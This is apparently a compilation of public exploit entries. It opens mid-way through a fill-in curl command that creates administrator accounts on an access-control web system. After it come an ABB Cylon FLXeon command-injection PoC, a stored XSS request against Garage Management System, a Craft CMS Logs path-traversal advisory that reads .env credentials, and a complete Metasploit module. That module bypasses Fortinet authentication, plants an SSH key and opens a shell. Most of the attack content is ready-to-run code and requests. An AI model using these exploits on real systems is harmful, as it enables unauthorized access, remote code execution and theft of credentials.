    -H $'Upgrade-Insecure-Requests: 1' \
    -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
    -H $'Sec-Fetch-Site: cross-site' \
    -H $'Sec-Fetch-Mode: navigate' \
    -H $'Sec-Fetch-Dest: document' \
    -H $'Accept-Encoding: gzip, deflate, br' \
    -H $'Priority: u=0, i' \
    -H $'Connection: keep-alive' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 111' \
    -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
    --data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \
    $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'

After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in the OS

ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)

# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
                    CBX Series (FLX Series)
                    CBT Series
                    CBV Series
                    Firmware: <=9.3.4

Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features
a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and
INTEGRA™ building management solutions. ABB BACnet controllers are designed
for intelligent control of HVAC equipment such as central plant, boilers,
chillers, cooling towers, heat pump systems, air handling units (constant
volume, variable air volume, and multi-zone), rooftop units, electrical
systems such as lighting control, variable frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's
scalable, and modular, allowing you to control a diverse range of HVAC functions.

Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated
remote root code execution via the /api/timeConfig endpoint. An attacker with
valid credentials can inject arbitrary system commands by manipulating
parameters such as tz, timeServerYN, and multiple timeDate fields. The
vulnerability exists due to improper input validation in timeConfig.js, where
user-supplied data is executed via ChildProcess.exec() without adequate
sanitization.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5910
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php
CVE ID: CVE-2024-48841
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841

21.04.2024

--

$ cat project

                     P R O J E C T
              [ zeroscience ASCII banner ]

$ curl -k -X PUT "https://7.3.3.1/api/timeConfig" \
> -H "Cookie: user_sid=xxx" \
> -H "Content-Type: application/json" \
> -d '{"timeConfig":{"timeDate":{\
> "yy":"`sleep 17`",\
> "mm":"`sleep 17`",\
> "dd":"`sleep 17`",\
> "h":"`sleep 17`",\
> "m":"`sleep 17`",\
> "s":"`sleep 17`"},\
> "tz":"`sleep 17`",\
> "tzList":[],\
> "timeServerYN":"`sleep 17`",\
> "timeServer":"1.1.1.1",\
> "timeServerSync":false}}'

Garage Management System 1.0 (categoriesName) - Stored XSS

# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
# Date: 18-09-2022
# Exploit Author: Sam Wallace, SC
# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2022-41358

Summary: Garage Management System utilizes client-side validation to prevent XSS. Using Burp, a request can be modified and replayed to the server, bypassing this validation, which creates an avenue for XSS.

Parameter: categoriesName
URI: /garage/php_action/createCategories.php

POC:

POST /garage/php_action/createCategories.php HTTP/1.1
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close

------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"

<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"

1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"


------WebKitFormBoundaryqKDsN4gmatTEEkhS--

Ethercreative Logs 3.0.3 - Path Traversal

# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal # Date: 2022.01.26 # Exploit Author: Steffen Rogge, SC # Vendor Homepage: https://github.com/ethercreative/logs # Software Link: https://plugins.craftcms.com/logs # Version: <=3.0.3 # Tested on: Linux # CVE : CVE-2022-23409 product: Ethercreative Logs plugin for Craft CMS fixed version: >=3.0.4 impact: Medium found: 2021-07-06 SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "A quick and dirty way to access your logs from inside the CP" As found on the plugin store page: https://plugins.craftcms.com/logs Active Installs 4,093 (as of 2021-07-07) Business recommendation: ------------------------ The vendor provides a patched version v3.0.4 which should be installed immediately. Vulnerability overview/description: ----------------------------------- 1) Authenticated Path Traversal (CVE-2022-23409) The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside the backend of the CMS. As the requested logfile is not properly validated, an attacker is able to request arbitrary files from the underlying file system with the permissions of the web service user. Proof of concept: ----------------- 1) Authenticated Path Traversal (CVE-2022-23409) As the plugin is installed as an administrator of the system and the function is only accessible after being logged in as an admin, an attacker needs to be authenticated as an administrator in the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request. 
The vulnerable endpoint is provided by the plugin under the following path:
https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream

The vulnerable controller for that endpoint can be found here:
https://github.com/ethercreative/logs/blob/master/src/Controller.php

The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input values before the file content is read by the function "file_get_contents":

public function actionStream ()
{
    $logsDir = \Craft::getAlias('@storage/logs');
    $logFile = \Craft::$app->request->getParam('log');
    $currentLog = \Craft::$app->request->get('log', $logFile);
    $log = file_get_contents($logsDir . '/' . $currentLog);
    exit($log);
}

A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem with the rights of the user executing the web server. In most cases this will be the user "www-data". In order to read the file ".env" or ".env.php", which contains the environment configuration and as such also the database credentials, the following request can be used:

GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;

The response then discloses the content of the file ".env":

HTTP/1.1 200 OK
Date: Thu, 07 Jul 2021 10:08:52 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
Content-Length: 1600
Connection: close

[...]
$craftEnvVars = [
    'DB_DRIVER' => 'mysql',
    'DB_SERVER' => '********',
    'DB_USER' => '********',
    'DB_PASSWORD' => '********',
    'DB_DATABASE' => '********',
    'DB_SCHEMA' => 'public',
    'DB_TABLE_PREFIX' => '',
    'DB_PORT' => '********',
    'SECURITY_KEY' => '********',
[...]
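The check that actionStream() lacks, as an added example that is neither the plugin's code nor the vendor's 3.0.4 patch: a resolver that accepts only a bare file name and confirms that the realpath() result still lies under the logs directory, exercised against a constructed temporary tree laid out like the advisory's ../../.env request. The function name resolveLogPath and the demo layout are assumptions.

```php
<?php
// Added example: not the plugin's code and not the vendor's 3.0.4 patch.
// resolveLogPath() (hypothetical name) is the check actionStream() lacks.
declare(strict_types=1);

function resolveLogPath(string $logsDir, string $requested): ?string
{
    $base = realpath($logsDir);
    if ($base === false) {
        return null;
    }
    // Accept only a bare file name: basename() must leave it unchanged,
    // and the allow-list rejects leading dots (".", "..", ".env") and NUL.
    if ($requested === '' || basename($requested) !== $requested
        || !preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]*$/', $requested)) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    // realpath() collapses symlinks and "..", so the prefix test applies to
    // the final on-disk location, not to the string the client sent.
    if ($path === false || !is_file($path)
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Constructed demo layout: one real log plus a ".env" two levels up, the
// same relative position the advisory's ../../.env request targets.
$root = sys_get_temp_dir() . '/logs-demo-' . bin2hex(random_bytes(4));
mkdir("$root/storage/logs", 0700, true);
file_put_contents("$root/storage/logs/web.log", "ok\n");
file_put_contents("$root/.env", "DB_PASSWORD=placeholder\n");
$logsDir = "$root/storage/logs";

foreach (['web.log', '../../.env', 'web.log/../../../.env', '.env', 'missing.log'] as $req) {
    $resolved = resolveLogPath($logsDir, $req);
    printf("%-24s -> %s\n", $req, $resolved === null ? 'rejected' : 'served ' . $resolved);
}

// Tidy up the temporary tree.
unlink("$root/storage/logs/web.log");
unlink("$root/.env");
rmdir("$root/storage/logs");
rmdir("$root/storage");
rmdir($root);
```

Only web.log is served; the other four names are rejected before file_get_contents() would ever run.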
Vulnerable / tested versions:
-----------------------------
The following version has been tested, which was the latest version available at the time of the test:
* Version 3.0.3 released on November 25, 2019
Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs

Vendor contact timeline:
------------------------
2021-07-07: Contacting vendor through dev@ethercreative.co.uk
2021-07-08: Response from vendor, no encryption available but vendor accepted responsibility for any risks involved with plaintext communication
2021-07-08: Advisory was sent to vendor unencrypted
2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4 (https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
2021-07-12: Updated plugin has been tested on an up-to-date CraftCMS installation (CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
2022-01-24: Release of security advisory

Solution:
---------
The vendor released a patched version 3.0.4 or higher which can be retrieved from their website/GitHub:
https://plugins.craftcms.com/logs
https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4

Workaround:
-----------
Uninstall/disable the plugin and access the Craft CMS logs via SSH or other services.

Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested in working with the experts of SEC Consult? Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Steffen Rogge / @2022
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
# Date: 2022-10-10
# Exploit Author: Zach Hanley, SC
# Vendor Homepage: https://www.fortinet.com
# Version: 7.0.0
# Tested on: Linux
# CVE : CVE-2022-40684

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH
  prepend Msf::Exploit::Remote::AutoCheck

  attr_accessor :ssh_socket

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
        'Description' => %q{
          This module exploits an authentication bypass vulnerability in the
          Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain
          access to a chosen account. It then adds an SSH key to the
          authorized_keys file of the chosen account, allowing login to the
          system as that account. Successful exploitation results in remote
          code execution.
        },
        'Author' => [
          'Heyder Andrade <@HeyderAndrade>', # Metasploit module
          'Zach Hanley <@hacks_zach>', # PoC
        ],
        'References' => [
          ['CVE', '2022-40684'],
          ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
          ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2022-10-10', # Vendor advisory
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Privileged' => true,
        'Targets' => [
          [
            'FortiOS',
            {
              'DefaultOptions' => {
                'PAYLOAD' => 'generic/ssh/interact'
              },
              'Payload' => {
                'Compat' => {
                  'PayloadType' => 'ssh_interact'
                }
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            IOC_IN_LOGS,
            ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
          ]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
        OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
        OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
        OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
        OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
        OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
      ]
    )
  end

  def username
    if datastore['USERNAME']
      @username ||= datastore['USERNAME']
    else
      @username ||= detect_username
    end
  end

  def ssh_rport
    datastore['SSH_RPORT']
  end

  def current_keys
    @current_keys ||= read_keys
  end

  def ssh_keygen
    # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
    if datastore['PRIVATE_KEY']
      @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
        File.read(datastore['PRIVATE_KEY']),
        datastore['KEY_PASS'],
        datastore['PRIVATE_KEY']
      )
    else
      @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
    end
  end

  def ssh_private_key
    ssh_keygen.to_pem
  end

  def ssh_pubkey
    Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
  end

  def authorized_keys
    pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
    "#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
  end

  def fortinet_request(params = {})
    send_request_cgi(
      {
        'ctype' => 'application/json',
        'agent' => 'Report Runner',
        'headers' => {
          'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
        }
      }.merge(params)
    )
  end

  def check
    vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
    # a normal request to the API should return a 401
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
      'ctype' => 'application/json'
    })
    return CheckCode::Unknown('Target did not respond to check.') unless res
    return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401

    # Trying to bypass the authentication and get the sshkey from the current targeted user; it should return a 200 if vulnerable
    res = fortinet_request({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/status')
    })
    return CheckCode::Safe unless res&.code == 200

    version = res.get_json_document['version']
    print_good("Target is running the version #{version}, which is vulnerable.")
    Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock|
      return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\'t give you access to the host.') unless sock
    }
    CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
  end

  def cleanup
    return unless ssh_socket

    # it assumes our key is the last one and sets it to an empty string. The API didn't respond to the DELETE method
    data = { "ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""' }
    fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => data.to_json
    })
  end

  def detect_username
    vprint_status('User auto-detection...')
    res = fortinet_request(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin')
    )
    users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
    # we prefer to use admin, but if it doesn't exist we choose a random one.
    if datastore['PREFER_ADMIN']
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
      users.include?('admin') ? 'admin' : users.sample
    else
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random one that is not the admin.")
      (users - ['admin']).sample
    end
  end

  def add_ssh_key
    if current_keys.include?(authorized_keys)
      # then we'll remove that on cleanup
      print_good('Your key is already in the authorized_keys file')
      return
    end

    vprint_status('Adding SSH key to authorized_keys file')
    # Adding the SSH key as the last entry in the authorized_keys file
    keystoadd = current_keys.first(2) + [authorized_keys]
    data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h
    res = fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => data.to_json
    })
    fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500

    body = res.get_json_document
    fail_with(Failure::UnexpectedReply, 'Unexpected response from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
  end

  def read_keys
    vprint_status('Reading SSH key from authorized_keys file')
    res = fortinet_request({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
    })
    fail_with(Failure::UnexpectedReply, 'Failed to read current SSH keys') unless res&.code == 200

    result = res.get_json_document['results'].first
    ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
      result[key].gsub('"', '') unless result[key].empty?
    end.compact
  end

  def do_login(ssh_options)
    # ensure we don't have a stale socket hanging around
    ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
      end
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, 'Timed out during negotiation')
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, 'Failed authentication')
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
    end
    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
  end

  def exploit
    print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
    add_ssh_key
    vprint_status('Establishing SSH connection')
    ssh_options = ssh_client_defaults.merge({
      auth_methods: ['publickey'],
      key_data: [ ssh_private_key ],
      port: ssh_rport
    })
    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
    do_login(ssh_options)
    handler(ssh_socket)
  end
end